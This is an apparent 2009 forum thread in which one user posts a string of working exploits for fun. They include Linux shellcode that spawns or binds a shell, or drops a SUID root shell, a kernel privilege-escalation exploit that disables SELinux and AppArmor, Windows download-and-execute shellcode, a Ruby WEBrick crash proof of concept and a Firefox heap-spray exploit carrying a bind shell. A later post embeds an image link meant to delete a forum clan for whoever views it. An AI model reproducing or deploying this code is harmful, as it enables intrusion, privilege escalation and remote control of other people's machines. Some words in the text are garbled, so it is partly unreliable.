Bored, posting random exploits
char code[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)code; } |
Posted On: 07/17/2009 12:03PM by quantumenergy
char code[] = "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\xb0\x66" // mov al, 102 "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax "\x52" // push edx "\x66\x68\x4e\x20" // push word 8270 "\x43" // inc ebx "\x66\x53" // push bx "\x89\xe1" // mov ecx, esp "\xb0\xef" // mov al, 239 "\xf6\xd0" // not al "\x50" // push eax "\x51" // push ecx "\x57" // push edi "\x89\xe1" // mov ecx, esp "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\xb0\x66" // mov al, 102 "\x43" // inc ebx "\x43" // inc ebx "\xcd\x80" // int 80h "\x50" // push eax "\x50" // push eax "\x57" // push edi "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx "\x89\xc3" // mov ebx, eax "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop lp "\x51" // push ecx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\xf4" // mov al, 244 "\xf6\xd0" // not al "\xcd\x80"; // int 80h main() { void (*a)() = (void *)code; int i; printf("size: %d bytes\n", strlen(code)); printf("Testing for cntrl characters.. "); for(i=0;i<strlen(code);i++) if(iscntrl(code[i])) printf("FAILED\n"), exit(255); printf("PbumED\n"); a(); } |
Posted On: 07/17/2009 12:05PM by quantumenergy
/* linux/x86 (shamelessly ripped from one of my unpublished exploits) */ /* fork()'s, does setreuid(0, 0); then execve()'s: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. */ char shellc[] = /* anathema <anathema@hack.co.za> */ /* Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax in the commenting, bored with AT&T syntax.. */ /* main: if (fork()) goto exeunt; else goto carryon; */ "\x29\xc0" /* sub ax, ax */ "\xb0\x02" /* mov al, 2 */ "\xcd\x80" /* int 0x80 */ "\x85\xc0" /* test ax, ax */ "\x75\x02" /* jnz exeunt */ "\xeb\x05" /* jmp carryon */ /* exeunt: exit(x); */ "\x29\xc0" /* sub ax, ax */ "\x40" /* inc ax */ "\xcd\x80" /* int 0x80 */ /* carryon: setreuid(0, 0); goto callz; */ "\x29\xc0" /* sub ax, ax */ "\x29\xdb" /* sub bx, bx */ "\x29\xc9" /* sub cx, cx */ "\xb0\x46" /* mov al, 0x46 */ "\xcd\x80" /* int 0x80 */ "\xeb\x2a" /* jmp callz */ /* start: execve() */ "\x5e" /* pop si */ "\x89\x76\x32" /* mov [bp+0x32], si */ "\x8d\x5e\x08" /* lea bx, [bp+0x08] */ "\x89\x5e\x36" /* mov [bp+0x36], bx */ "\x8d\x5e\x0b" /* lea bx, [bp+0x0b] */ "\x89\x5e\x3a" /* mov [bp+0x3a], bx */ "\x29\xc0" /* sub ax, ax */ "\x88\x46\x07" /* mov [bp+0x07], al */ "\x88\x46\x0a" /* mov [bp+0x0a], al */ "\x88\x46\x31" /* mov [bp+0x31], al */ "\x89\x46\x3e" /* mov [bp+0x3e], ax */ "\x87\xf3" /* xchg si, bx */ "\xb0\x0b" /* mov al, 0x0b */ "\x8d\x4b\x32" /* lea cx, [bp+di+0x32] */ "\x8d\x53\x3e" /* lea dx, [bp+di+0x3e] */ "\xcd\x80" /* int 0x80 */ /* callz: call start */ "\xe8\xd1\xff\xff\xff" /* call start */ /* data - command to execve() */ "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e\x2f" "\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34" "\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x68"; /** test out the shellcode **/ main () { void (*sc)() = (void *)shellc; sc(); } |
Posted On: 07/17/2009 12:05PM by quantumenergy
Now a really recent one: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> #include <fcntl.h> #include <poll.h> #include <sys/personality.h> #ifdef RHEL5_SUCKS #define OFFSET_OF_FLAGS 0x4 #else #define OFFSET_OF_FLAGS 0x8 #endif struct sock { char gibberish1[0x60]; #ifdef RHEL5_SUCKS char gibberish2[0xb0]; // this seems to do the trick ;) #else char gibberish2[0xe0]; // gotta make sure this >> 1 is not >= above #endif unsigned long gibberish3[0x50]; }; static void craft_sock(struct sock *sk, unsigned long target_addr) { int i; memset(sk->gibberish1, 0, sizeof(sk->gibberish1)); memset(sk->gibberish2, 0, sizeof(sk->gibberish2)); for (i = 0; i < sizeof(sk->gibberish3)/sizeof(sk->gibberish3[0]); i++) sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS; } static void or_one_to_kernel_address(unsigned long target_addr) { struct sock *sk = NULL; int fd; struct pollfd pfd; craft_sock(sk, target_addr); fd = open("/dev/net/tun", O_RDWR); if (fd == -1) { fprintf(stdout, "UNABLE TO OPEN /dev/net/tun!\n"); return; } pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0); close(fd); fprintf(stdout, " [+] *%p |= 1\n", (void *)target_addr); } static unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[256]; int ret; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { fprintf(stdout, "Unable to obtain symbol listing!\n"); exit(0); } ret = 0; while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } /* fastcalls! 
*/ typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef int __attribute__((regparm(3))) (*_nf_unregister_hooks)(unsigned long *ops, int count); typedef int __attribute__((regparm(3))) (*_unregister_filesystem)(unsigned long arg); unsigned long *tun_mmap_fop; unsigned long sel_fs_type; unsigned long *mmap_min_addr; int *audit_enabled; int *ss_initialized; int *selinux_enforcing; int *selinux_enabled; int *selinux_mls_enabled; int *sel_enforce_ptr; int *apparmor_enabled; int *apparmor_logsyscall; int *apparmor_audit; int *apparmor_complain; unsigned long *security_ops; unsigned long default_security_ops; unsigned long sel_read_bool; unsigned long security_get_bool_value; unsigned long sel_read_enforce; _commit_creds commit_creds; unsigned long init_cred; _nf_unregister_hooks nf_unregister_hooks; unsigned long * selinux_ipv4_ops; unsigned long * selinux_ipv6_ops; _unregister_filesystem unregister_filesystem; int what_we_do; unsigned int our_uid; int got_root; /* for RHEL5 2.6.18 with 4K stacks */ static inline unsigned long get_current(void) { unsigned long current; asm volatile ( " movl %%esp, %%eax;" " andl %1, %%eax;" " movl (%%eax), %0;" : "=r" (current) : "i" (0xfffff000) ); return current; } static void old_style_gimme_root(void) { unsigned int *current; unsigned long orig_current; current = (unsigned int *)get_current(); orig_current = (unsigned long)current; while (((unsigned long)current < (orig_current + 0x1000)) && (current[0] != our_uid || current[1] != our_uid || current[2] != our_uid || current[3] != our_uid)) current++; if ((unsigned long)current >= (orig_current + 0x1000)) return; current[0] = current[1] = current[2] = current[3] = 0; // uids current[4] = current[5] = current[6] = current[7] = 0; // gids got_root = 1; return; } static int __attribute__((regparm(3))) own_the_kernel(void *a, void *b) { // clean up after ourselves ;) if (tun_mmap_fop) *tun_mmap_fop = 0; if (audit_enabled) *audit_enabled = 0; // giggles 
//if (mmap_min_addr) // *mmap_min_addr = 0; // disable apparmor if (apparmor_enabled && *apparmor_enabled) { what_we_do = 1; *apparmor_enabled = 0; if (apparmor_audit) *apparmor_audit = 0; if (apparmor_logsyscall) *apparmor_logsyscall = 0; if (apparmor_complain) *apparmor_complain = 0; } // disable SELinux if (selinux_enforcing && *selinux_enforcing) { what_we_do = 2; *selinux_enforcing = 0; } if (!selinux_enabled || selinux_enabled && *selinux_enabled == 0) { // trash LSM if (default_security_ops && security_ops) { if (*security_ops != default_security_ops) what_we_do = 3; *security_ops = default_security_ops; } } /* make the idiots think selinux is enforcing */ if (sel_read_enforce || (sel_read_bool && security_get_bool_value)) { unsigned char *p; unsigned long _cr0; asm volatile ( "mov %%cr0, %0" : "=r" (_cr0) ); _cr0 &= ~0x10000; asm volatile ( "mov %0, %%cr0" : : "r" (_cr0) ); if (sel_read_enforce) { if (sizeof(unsigned int) != sizeof(unsigned long)) { /* 64bit version, look for the mov ecx, [rip+off] and replace with mov ecx, 1 */ for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) { if (p[0] == 0x8b && p[1] == 0x0d) { p[0] = '\xb9'; p[5] = '\x90'; *(unsigned int *)&p[1] = 1; goto and_now; } } } else { /* 32bit, replace push [selinux_enforcing] with push 1 */ for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) { if (p[0] == 0xff && p[1] == 0x35) { #ifdef RHEL5_SUCKS // while we're at it, disable // SELinux without having a // symbol for selinux_enforcing ;) sel_enforce_ptr = *(unsigned int **)&p[2]; *sel_enforce_ptr = 0; what_we_do = 2; #endif p[0] = '\x68'; p[5] = '\x90'; *(unsigned int *)&p[1] = 1; goto and_now; } } } } and_now: /* if (sel_read_bool && security_get_bool_value) { for (p = (unsigned char *)sel_read_bool; (unsigned long)p < (sel_read_bool + 0x300); p++) { if (p[0] == 0xe8 && (((unsigned long)&p[5] + *(int *)&p[1]) == security_get_bool_value)) { *p = '\xa1'; 
*(unsigned int *)(p + 1) = 1; goto next_part; } } } next_part: */ _cr0 |= 0x10000; asm volatile ( "mov %0, %%cr0" : : "r" (_cr0) ); } /* if (nf_unregister_hooks) { if (selinux_ipv4_ops && *selinux_ipv4_ops) { nf_unregister_hooks(selinux_ipv4_ops, 3); *selinux_ipv4_ops = 0; } if (selinux_ipv6_ops && *selinux_ipv6_ops) { nf_unregister_hooks(selinux_ipv6_ops, 2); *selinux_ipv6_ops = 0; } } */ //if (unregister_filesystem && sel_fs_type) // unregister_filesystem(sel_fs_type); /* and now give ourselves full privileges */ if (commit_creds && init_cred) { /* hackish usage increment */ *(volatile int *)(init_cred) += 1; commit_creds(init_cred); got_root = 1; } #ifdef RHEL5_SUCKS else { // must be RHEL5 2.6.18 old_style_gimme_root(); } #endif return -1; } static void boom_goes_the_dynamite(void) { char *mem; int fd; fprintf(stdout, " [+] b00m!\n"); fd = open("/dev/net/tun", O_RDONLY); mem = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); close(fd); return; } int pa__init(void *m) { char *mem; int fd; int ret; our_uid = getuid(); /* open it so we can have it auto-loaded and resolve its symbols below */ fd = open("/dev/net/tun", O_RDONLY); if (fd == -1) { fprintf(stdout, "UNABLE TO OPEN THE DEVICE!\n"); return 1; } close(fd); if ((personality(0xffffffff)) != PER_SVR4) { mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (mem != NULL) { fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n"); return 1; } } else { ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC); if (ret == -1) { fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n"); return 1; } } fprintf(stdout, " [+] MAPPED ZERO PAGE!\n"); /* make an mmap handler for the tun device at 0x1 mmap fop offset is sizeof(ptr) * 11 */ tun_mmap_fop = (unsigned long *)(get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11)); selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing"); //selinux_enabled = (int *)get_kernel_sym("selinux_enabled"); //selinux_mls_enabled = (int 
*)get_kernel_sym("selinux_mls_enabled"); //ss_initialized = (int *)get_kernel_sym("ss_initialized"); apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled"); apparmor_complain = (int *)get_kernel_sym("apparmor_complain"); apparmor_audit = (int *)get_kernel_sym("apparmor_audit"); apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall"); nf_unregister_hooks = (_nf_unregister_hooks)get_kernel_sym("nf_unregister_hooks"); //selinux_ipv4_ops = (unsigned long *)get_kernel_sym("selinux_ipv4_ops"); //selinux_ipv6_ops = (unsigned long *)get_kernel_sym("selinux_ipv6_ops"); security_ops = (unsigned long *)get_kernel_sym("security_ops"); default_security_ops = get_kernel_sym("default_security_ops"); //sel_read_bool = get_kernel_sym("sel_read_bool"); sel_read_enforce = get_kernel_sym("sel_read_enforce"); //security_get_bool_value = get_kernel_sym("security_get_bool_value"); //mmap_min_addr = (unsigned long *)get_kernel_sym("mmap_min_addr"); audit_enabled = (int *)get_kernel_sym("audit_enabled"); commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); init_cred = get_kernel_sym("init_cred"); //sel_fs_type = get_kernel_sym("sel_fs_type"); //unregister_filesystem = (_unregister_filesystem)get_kernel_sym("unregister_filesystem"); or_one_to_kernel_address((unsigned long)tun_mmap_fop); /* two cases, fancy trickery */ if (sizeof(unsigned int) != sizeof(unsigned long)) { // 64bit *(char *)1 = '\xff'; *(char *)2 = '\x25'; *(unsigned int *)3 = 0; // pc-relative and such yes ;) *(unsigned long *)(3 + 4) = (unsigned long)&own_the_kernel; } else { // 32bit *(char *)1 = '\xe9'; *(unsigned long *)2 = (unsigned long)&own_the_kernel - 6; } boom_goes_the_dynamite(); { char *msg; switch (what_we_do) { case 1: msg = "AppArmor"; break; case 2: msg = "SELinux"; break; case 3: msg = "LSM"; break; default: msg = "nothing, what an insecure machine!"; } fprintf(stdout, " [+] Disabled security of : %s\n", msg); } if (got_root == 1) fprintf(stdout, " [+] Got root!\n"); else { 
fprintf(stdout, " [+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?\n"); exit(0); } fprintf(stdout, " [+] BAM! About to launch your rootshell!...but first some chit-chat...\n"); sleep(3); fprintf(stdout, " , ,\n"); fprintf(stdout, " /(_, ,_)\\\n"); fprintf(stdout, " \\ _/ \\_ /\n"); fprintf(stdout, " // \\\\\n"); fprintf(stdout, " \\\\ (@)(@) //\n"); fprintf(stdout, " \\'=\"==\"='/\n"); fprintf(stdout, " ,===/ \\===,\n"); fprintf(stdout, " \",===\\ /===,\"\n"); fprintf(stdout, " \" ,==='------'===, \"\n"); fprintf(stdout, " \" \"\n"); fprintf(stdout, "Do you know the deadliest catch?\n"); { char buf[20]; fgets(buf, sizeof(buf)-1, stdin); } sleep(1); fprintf(stdout, "That's right! MAN is the deadliest catch of all!\n"); sleep(2); { char wait[] = "WAIIIIIIIIIITTTT...."; int i; for (i = 0; i < sizeof(wait); i++) { fprintf(stdout, "%c", wait[i]); fflush(stdout); usleep(200 * 1000); } } fprintf(stdout, "do you hear it?\n"); sleep(2); fprintf(stdout, "You hear it! You do too! It's not just me! It's here, it's here I say!!\n"); sleep(3); fprintf(stdout, "I must face this....\n"); fprintf(stdout, "\x7"); fflush(stdout); sleep(1); fprintf(stdout, "\x7"); fflush(stdout); sleep(1); fprintf(stdout, "\x7"); fflush(stdout); sleep(1); fprintf(stdout, "What's this? Something stirs within the beast's belly! Something unexpected"); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "."); fflush(stdout); usleep(500 * 1000); fprintf(stdout, "\n"); sleep(3); execl("/bin/sh", "/bin/sh", "-i", NULL); return 0; } void pa__done(void *m) { return; } int main(void) { pa__init(NULL); }quantumenergy edited this message on 07/17/2009 12:13PM |
Posted On: 07/17/2009 12:13PM by quantumenergy
This **** works on Windows: .386 .model flat,stdcall ROL_CONSTANT equ 5 mrol macro iNum:req,iBits:req exitm <(iNum shl iBits) or (iNum shr (32-iBits))> endm mror macro iNum:req,iBits:req exitm <(iNum shr iBits) or (iNum shl (32-iBits))> endm hashapi macro szApi local dwApi dwApi = 0 forc x,szApi dwApi = dwApi + '&x' dwApi = mrol(dwApi,ROL_CONSTANT) endm dwApi = mrol(dwApi,ROL_CONSTANT) dw (dwApi and 0ffffh) endm .code bumume fs:nothing code_start: jmp load_data IFDEF TEST_CODE extern URLDownloadToFileA :proc call URLDownloadToFileA ; included when bumembled with /DTEST_CODE ENDIF setup_parameters: pop edi ; offset @cmd_start xor eax,eax ; eax = 0 cdq ; edx = 0 ; ******************************************************************** push eax ; exit code = 0 ; ******************************************************************** push eax ; SW_HIDE mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes push edi ; file name to execute ; ******************************************************************** push eax ; callback routine URLDownLoadToFileA push eax ; reserved, must be zero push edi ; file name to save as add edi,edx ; get offset of @url_start-1 stosb ; zero tail end mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url push edi ; url to download file from push eax ; interface add edi,edx ; get offset of @urlmon-1 stosb ; zero tail end of url ; ********************************************************************* load_modules: push edi ; save current offset to hashes push 30h pop ecx mov eax,fs:[ecx] ; PEB base address mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList scan_dll: mov ebx,[ebp+8] ; DllBase mov ebp,[ebp] ; Flink push ebp ; save mov eax,[ebx+3ch] mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames lodsd xchg eax,ecx ; ecx = NumberOfNames lodsd add eax,ebx ; AddressOfFunctions push eax lodsd lea edi,[eax+ebx] ; 
AddressOfNames lodsd lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals load_api: mov esi,[edi+4*ecx-4] add esi,ebx xor eax,eax cdq hash_api: lodsb add edx,eax rol edx,ROL_CONSTANT dec eax jns hash_api mov esi,[esp+8] ; get api hashes cmp dx,word ptr[esi] ; found a match? je call_api loop load_api pop eax ; check pop ebp ; jmp scan_dll call_api: pop eax movzx edx,word ptr [ebp+2*ecx-2] add ebx,[eax+4*edx] pop ebp ; modules pop edi ; api hashes call ebx ; call api stosw ; advance 2 bytes to next hash jmp load_modules ; do another, just keep going until ExitProcess is reached. ; ************************* load_data: call setup_parameters @cmd_start: db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE); @cmd_end: @url_start: db 'http://127.0.0.1/file.exe',0ffh ; url of file to download @url_end: hashapi <URLDownloadToFileA> hashapi <WinExec> hashapi <ExitProcess> ; ********************************************************************* end code_start |
Posted On: 07/17/2009 12:18PM by quantumenergy
This thing might work on Forumwarz: ------------------------------------------------------- Language : Ruby Web Site: www.ruby-lang.org Platform: All Bug: Remote Socket Memory Leak Products Affected: 1.8 series: - 1.8.5 and all prior versions - 1.8.6-p286 and all prior versions - 1.8.7-p71 and all prior versions 1.9 series - r18423 and all prior revisions Confirmed by the vendor: Yes Patch available: Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Credits =============== 1) Introduction =============== "A dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write." ======= 2) Bug ======= Ruby fails to properly handle the memory allocated for a socket, so when you send ~4 big requests to a Ruby socket, Ruby goes into an infinite loop and then crashes. The bug resides in the regex engine (in regex.c). ================== 3) Proof of concept =================== This PoC is an example for the WEBrick web server, crap.pl: #!/usr/bin/perl use LWP::Simple; my $payload = "\x41" x 49999999; while(1) { print "[+]\n"; get "http://127.0.0.1:2500/".$payload.""; } Result (example on WEBrick web server): [2008-07-11 22:39:55] INFO WEBrick 1.3.1 [2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] [2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 [2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' /usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start' /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' script/server:62 [FATAL] failed to allocate memory root@audit:/home/audit# ===== 4) Credits ===== Laurent Gaffié laurent.gaffie{remove_this}[at]gmail[dot]com # milw0rm.com [2008-08-13]
Posted On: 07/17/2009 12:29PM by quantumenergy
If you’re running Firefox you’re at risk: #!/usr/bin/env python ####################################################### # # FireFox 3.5 Heap Spray Exploit # Originally discovered by: Simon Berry-Bryne # Pythonized by: David Kennedy (ReL1K) @ SecureState # ####################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys clbum myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.wfile.write(""" <html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Exploit </br> Discovered by: SBerry aka Simon Berry-Byrne Pythonized: David Kennedy (ReL1K) at SecureState Bind Shell Port: 5500 Encoding: Shikata_Ga_Nai </br> <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>Ihazacrashihazacrash</FONT></p> <p> <FONT>Ohnoesihazacrashhazcrash</FONT> </p> <p> <FONT>Aaaaahhhhh </FONT> </p> </div> <script language=JavaScript> // windows/shell_bind_tcp - 317 bytes http://www.metasploit.com LPORT=5500 encoding=shikata_ga_nai var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" + "%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" + "%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" + "%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" + "%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" + "%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" + "%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" + "%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" + "%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" + "%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" + "%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" + 
"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" + "%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" + "%uff53%uffd6%u41d0"); oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = dogreat timesent.getElementById("content") if (dogreat timesent.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html>""") print ("\n\n[-] Exploit sent... 
[-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target)) def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() httpd = HTTPServer(('', 80), myRequestHandler) print (""" ####################################################### # # FireFox 3.5 Heap Spray # Originally discovered by: Simon Berry-Bryne # Pythonized: David Kennedy (ReL1K) @ SecureState # ####################################################### """) print ("Listening on port 80.") print ("Have someone connect to you.") print ("\nType <control>-c to exit..") try: httpd.handle_request() httpd.serve_forever() except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit(1) # milw0rm.com [2009-07-17] |
Posted On: 07/18/2009 6:21AM by quantumenergy
As soon as I find the time I’ll read them all through.
Posted On: 07/18/2009 9:38AM by Stoneythestoner
Robots are invading my house!
Posted On: 07/24/2009 2:04AM by Inertia
This exploit used to cause Trout nightmares: [img]http://www.forumwarz.com/klans/delete_klan[/img]
Posted On: 07/27/2009 2:42AM by quantumenergy